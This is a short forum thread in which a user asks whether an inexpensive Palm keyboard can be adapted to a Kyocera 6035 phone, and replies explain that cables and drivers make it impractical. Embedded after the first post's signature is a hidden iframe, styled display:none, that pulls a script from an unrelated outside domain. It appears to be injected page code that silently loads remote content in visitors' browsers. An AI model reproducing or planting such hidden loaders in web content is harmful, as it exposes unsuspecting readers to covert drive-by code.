+ Reply to Thread

Palm Keyboard for Kyocera 6035?

I noticed that the keyboard designed for the m100/m105s and Palm V, etc. models are really inexpensive (around $12 on ebay, compare around $80 for the keyboard made by Kyocera). Is there any way to get one of those keyboards to work with the Kyocera? Like with a serial cable or something? Please let me know.
    Frank<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Palm Keyboard for Kyocera 6035?

Originally posted by FrankieNap
    I noticed that the keyboard designed for the m100/m105s and Palm V, etc. models are really inexpensive (around $12 on ebay, compare around $80 for the keyboard made by Kyocera). Is there any way to get one of those keyboards to work with the Kyocera? Like with a serial cable or something? Please let me know.
    Frank
    The simple answer is YES.

There is always a way. But I'm an oppertunist oops I mean optimist. You would more than likely be able to make a cable or converter for it from a Kyo cable and some cutting and soldering and discovering the right connections.

The realistic answer is NO though.

A lot of work unless you just want a project to work on.
    Remember, When the long night comes return to the end of the beginning.

A lot of folks tried after the 6035 came out almost 2 years ago. If my memory serves, they were never successful. Cables were made that didn't work and probably most importantantly, they needed custom 6035 drivers, which didn't exist.

I personally wouldn't bother, as I don't think it is possible.

I'm sure that once the 7135 comes out, the 6035 keyboard will drop in price.
    ~'kito
    pdaPhoneHome Moderator